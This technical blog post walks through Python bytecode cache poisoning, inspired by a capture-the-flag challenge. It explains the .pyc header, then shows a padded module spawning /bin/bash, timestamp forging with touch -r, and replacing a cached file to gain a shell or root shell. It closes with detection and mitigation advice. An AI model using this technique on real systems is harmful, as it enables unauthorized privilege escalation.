Python cache poisoning is mechanically simple, and exploitable under specific (and unfortunately still common) misconfigurations. In certain situations, as shown by a recent HackTheBox challenge (which shall remain unnamed), it can be used to elevate a malicious user's privileges and compromise a system. But first, let's understand why Python has a bytecode caching mechanism.
Python Objects
When you run a Python script, the interpreter compiles every module you import (i.e. not the script itself) and stores the resulting bytecode in a __pycache__ folder located alongside the module source code. When you run the script again, the interpreter loads the bytecode directly from the cache if nothing has changed.
This mechanism allows the interpreter to skip parsing and compiling the .py file, which speeds up startup. For a more detailed description of what Python bytecode looks like and of Python execution internals, you can check this article on opensource.com.
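To see where the interpreter would look for a given module's cached bytecode, the standard library exposes the mapping directly. This is a small sketch, not part of the original walkthrough; it only computes the path and does not require pyc_mod.py to exist.

```python
import importlib.util
import sys

# Map a source path to the cache file the import system would use for it.
cache_path = importlib.util.cache_from_source("pyc_mod.py")
print(cache_path)  # something like __pycache__/pyc_mod.cpython-314.pyc

# The interpreter-specific tag embedded in the file name.
print(sys.implementation.cache_tag)

# The mapping is reversible.
print(importlib.util.source_from_cache(cache_path))
```

The tag in the file name is why several interpreter versions can share one __pycache__ folder without overwriting each other's files.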
Let's consider this very simple example. The pyc_poison.py file is the main script that calls some functions from pyc_mod:
import pyc_mod as mod

def main():
    print("Hello World!")
    print(mod.sum_square(2, 3))
    print(mod.square(2))

if __name__ == "__main__":
    main()

The pyc_mod.py file defines the two functions, square and sum_square:
# (not so) complex module that provides helper functions
# for squaring and summing squares of integers

# return the sum of the squares of two integers
def sum_square(a: int, b: int) -> int:
    return a * a + b * b

def square(a: int) -> int:
    return a * a

Let's see what happens when the pyc_poison.py script is run:
% python3 pyc_poison.py
Hello World!
13
4
% ls __pycache__
pyc_mod.cpython-314.pyc
% stat -x -t %s pyc_mod.py
File: "pyc_mod.py"
Size: 248 FileType: Regular File
Mode: (0644/-rw-r--r--) Uid: ( 501/bigfatfrodo) Gid: ( 20/ staff)
Device: 1,14 Inode: 51659942 Links: 1
Access: 1769005410
Modify: 1769005409
Change: 1769005409
Birth: 1769002236

If we peek inside the cached file, we can see the following:
% xxd __pycache__/pyc_mod.cpython-314.pyc | head -4
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
00000010: e300 0000 0000 0000 0000 0000 0002 0000 ................
00000020: 0000 0000 00f3 1e00 0000 8000 5200 1700 ............R...
00000030: 5201 1700 6c10 7400 5202 1700 5203 1700 R...l.t.R...R...
.....

The Object Format
In preparation for our cache poisoning, we need to understand the format of the object file. The object file has a 16-byte header as follows:
- bytes 0-3: magic number identifying the Python bytecode version.
- bytes 4-7: a bit field; 0 for timestamp-based, 1 for hash-based unchecked, 3 for hash-based checked.
- bytes 8-11: source modified timestamp (as returned by stat) for timestamp-based files; for hash-based files, bytes 8-15 instead hold a 64-bit hash of the source.
- bytes 12-15: source file size (timestamp-based files only).
- bytes 16+: marshalled code object.
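The layout above can be decoded in a few lines. The following is a minimal sketch, assuming the PEP 552 header layout; the function name parse_pyc_header is made up for illustration, and the sample bytes are the first 16 bytes of the xxd dump shown earlier.

```python
import struct

def parse_pyc_header(data: bytes) -> dict:
    """Decode the 16-byte header of a .pyc file (layout per PEP 552)."""
    if len(data) < 16:
        raise ValueError("a .pyc header is 16 bytes long")
    (flags,) = struct.unpack("<I", data[4:8])
    header = {"magic": data[:4].hex(), "flags": flags}
    if flags & 0b01:
        # Hash-based: bytes 8-15 hold a 64-bit hash of the source.
        header["source_hash"] = data[8:16].hex()
        header["check_source"] = bool(flags & 0b10)
    else:
        # Timestamp-based: little-endian mtime and size, 32 bits each.
        mtime, size = struct.unpack("<II", data[8:16])
        header["mtime"] = mtime
        header["size"] = size
    return header

# First 16 bytes of pyc_mod.cpython-314.pyc from the dump above.
sample = bytes.fromhex("2b0e0d0a" "00000000" "61e17069" "f8000000")
parsed = parse_pyc_header(sample)
print(parsed)
# {'magic': '2b0e0d0a', 'flags': 0, 'mtime': 1769005409, 'size': 248}
```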
Quick reality check for our file:
- magic number 0x2b 0x0e 0x0d 0x0a, identifying Python 3.14 bytecode (the interpreter used here is 3.14.2)
- our source file size is 248 bytes, or 0xf8
- timestamp-based check, since the bit field is 0. The modify timestamp for the source is 1769005409, which matches 0x6970e161 (stored in little-endian order) in the header.
If any of these do not match (magic number, source file size, or the recorded timestamp versus the source's current modification time), the cache file is discarded and the code is recompiled.
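The check described above can be approximated in a few lines, which also makes its limits visible: only header fields are compared against the source's metadata, and nothing inspects the marshalled code that follows. This is a sketch of the idea rather than the import system's actual code; the function name and the throwaway demo_mod.py module are hypothetical.

```python
import importlib.util
import os
import py_compile
import struct
import tempfile

def timestamp_pyc_is_fresh(source_path: str, pyc_path: str) -> bool:
    """Approximate the freshness check for a timestamp-based .pyc."""
    with open(pyc_path, "rb") as f:
        header = f.read(16)
    if len(header) < 16 or header[:4] != importlib.util.MAGIC_NUMBER:
        return False  # truncated, or written for another bytecode version
    flags, mtime, size = struct.unpack("<III", header[4:16])
    if flags != 0:
        raise ValueError("hash-based .pyc; this sketch covers timestamps only")
    st = os.stat(source_path)
    # Both fields are stored as 32-bit values, so compare modulo 2**32.
    return (mtime == (int(st.st_mtime) & 0xFFFFFFFF)
            and size == (st.st_size & 0xFFFFFFFF))

with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_mod.py")  # hypothetical throwaway module
    with open(src, "w") as f:
        f.write("x = 1\n")
    pyc = py_compile.compile(
        src, invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP
    )
    fresh_before = timestamp_pyc_is_fresh(src, pyc)
    os.utime(src, (0, 12345))  # change only the source's timestamps
    fresh_after = timestamp_pyc_is_fresh(src, pyc)

print(fresh_before, fresh_after)  # True False
```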
Cache Poisoning
Now, these checks don't make it very difficult for a malicious actor to create a custom compiled object that would, for instance, give them a shell. Combined with other security faults, like allowing a regular user to run Python as root and allowing world-write access to the cache folder, this could result in a privilege escalation.
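From the defender's side, the writable-cache precondition is easy to look for. The sketch below walks a directory tree and reports __pycache__ folders that group or other users may write to. It assumes POSIX permission bits, the helper name is made up, and the demo builds its own temporary tree so it is safe to run anywhere.

```python
import os
import stat
import tempfile

def writable_cache_dirs(roots):
    """Yield (path, mode) for __pycache__ dirs writable by group or others."""
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, _dirnames, _filenames in os.walk(root):
            if os.path.basename(dirpath) != "__pycache__":
                continue
            try:
                mode = os.stat(dirpath).st_mode
            except OSError:
                continue  # vanished or unreadable; skip it
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                yield dirpath, stat.filemode(mode)

with tempfile.TemporaryDirectory() as tmp:
    loose = os.path.join(tmp, "app_a", "__pycache__")
    tight = os.path.join(tmp, "app_b", "__pycache__")
    os.makedirs(loose)
    os.makedirs(tight)
    os.chmod(loose, 0o777)  # the misconfiguration discussed above
    os.chmod(tight, 0o755)
    found = list(writable_cache_dirs([tmp]))

for path, mode in found:
    print(mode, path)
```

In practice one would pass sys.path (or an application's install directory) instead of the temporary tree. A source directory that is itself writable and has no __pycache__ yet deserves the same attention, since the folder can then simply be created.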
In our example, let's craft a pyc_malicious.py file whose compiled object will replace the cached pyc_mod object, so that calling sum_square from pyc_poison.py drops us into a shell:
import pty
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12345678
#12

# return the sum of the squares of two integers
def sum_square(a, b: int) -> int:
    pty.spawn('/bin/bash')

def square(a: int) -> int:
    return a * a

The size of this file must be exactly 248 bytes, hence the padding comments. The sum_square function is replaced with the shell spawn. The other function is unchanged.
This file can be compiled directly by running python3 -m py_compile pyc_malicious.py, and the result will also be placed in the __pycache__ folder.
% ls __pycache__/
pyc_malicious.cpython-314.pyc pyc_mod.cpython-314.pyc

Now, in the cache folder we have the original pyc_mod object file, as well as the new one. Note that I used the same Python version to generate the pyc_malicious object file.
Let's compare the two files now:
% xxd __pycache__/pyc_mod.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
%
% xxd __pycache__/pyc_malicious.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 fd07 7a69 f800 0000 +.........zi....
The magic number, the bit field and the size field match. The only thing remaining is to make the timestamp fields match as well. We can do that with touch:
% touch -r pyc_mod.py pyc_malicious.py
% stat -x -t %s pyc_malicious.py
File: "pyc_malicious.py"
Size: 248 FileType: Regular File
Mode: (0644/-rw-r--r--) Uid: ( 501/bigfatfrodo) Gid: ( 20/ staff)
Device: 1,14 Inode: 52358264 Links: 1
Access: 1769605821
Modify: 1769005409
Change: 1769605820
Birth: 1769005409

touch -r uses a reference file and updates the modified timestamp on the target file to match this reference. That's exactly what we need.
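The same operation is available from Python through os.utime, which underlines that a modification time is ordinary, user-settable metadata rather than evidence of when a file was really written. A minimal sketch follows; the helper name copy_times and the two scratch files are made up for the demo.

```python
import os
import tempfile

def copy_times(reference: str, target: str) -> None:
    """Set target's access and modify times to reference's, like touch -r."""
    ref = os.stat(reference)
    os.utime(target, ns=(ref.st_atime_ns, ref.st_mtime_ns))

with tempfile.TemporaryDirectory() as tmp:
    ref_path = os.path.join(tmp, "reference.py")
    tgt_path = os.path.join(tmp, "target.py")
    for path in (ref_path, tgt_path):
        with open(path, "w") as f:
            f.write("pass\n")
    # Give the reference the modify timestamp seen in the stat output above.
    os.utime(ref_path, (1769005410, 1769005409))
    copy_times(ref_path, tgt_path)
    copied_mtime = int(os.stat(tgt_path).st_mtime)

print(copied_mtime)  # 1769005409
```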
If we compile again and check headers:
% python3 -m py_compile pyc_malicious.py
% xxd __pycache__/pyc_mod.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....
% xxd __pycache__/pyc_malicious.cpython-314.pyc| head -1
00000000: 2b0e 0d0a 0000 0000 61e1 7069 f800 0000 +.......a.pi....

Now there is a perfect match between the headers of the two files. We can move the second over the first and run the pyc_poison.py script as before to get a shell:
% mv __pycache__/pyc_malicious.cpython-314.pyc __pycache__/pyc_mod.cpython-314.pyc
% ls __pycache__
pyc_mod.cpython-314.pyc
% python3 pyc_poison.py
Hello World!
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

Or, if the user is allowed to run Python with sudo, we get a root shell:
% sudo python3 pyc_poison.py
Hello World!
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2#

Things to Take Away
- To sum up, what we did was to replace a compiled bytecode object in the __pycache__ folder so that, without changing the code in the main script file, we can execute arbitrary code. This is "useful" when you can't change the script files, but the cache folder is writable.
- Even though PEP-552 introduces source file hashes into the pyc object header, they are not used when these objects are generated simply by running a script that imports other modules. And this is intentional, as all these hash computations and checks would impact performance.
- Python cache poisoning is another reason (among thousands) for which care should be taken when configuring which users can run what applications and with what privileges, and when deciding whether a folder should be writable or not.
- After all, __pycache__ is a cache, and not a security feature. Its purpose is to speed things up.
- Writing .pyc files can be disabled completely by using the -B argument to python or the PYTHONDONTWRITEBYTECODE environment variable. Note that these only stop Python from writing cache files; a .pyc that already sits in __pycache__ is still loaded.
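For completeness, here is what opting in to a PEP 552 hash-based file looks like. The sketch compiles a throwaway module (demo_mod.py, a hypothetical name) with py_compile in CHECKED_HASH mode and reads back the header. The stored hash covers the source text, not the bytecode, and can be recomputed with importlib.util.source_hash, so it should not be read as tamper protection for a writable cache folder.

```python
import importlib.util
import os
import py_compile
import struct
import tempfile

source = b"def square(a):\n    return a * a\n"

with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "demo_mod.py")  # hypothetical throwaway module
    with open(src, "wb") as f:
        f.write(source)
    pyc = py_compile.compile(
        src, invalidation_mode=py_compile.PycInvalidationMode.CHECKED_HASH
    )
    with open(pyc, "rb") as f:
        header = f.read(16)

(flags,) = struct.unpack("<I", header[4:8])
stored_hash = header[8:16]
print(flags)              # 3: hash-based, source checked on import
print(stored_hash.hex())  # 64-bit hash of the source text

# The same value can be recomputed from the source alone.
print(stored_hash == importlib.util.source_hash(source))  # True
```

A whole tree can be compiled the same way with python -m compileall --invalidation-mode checked-hash.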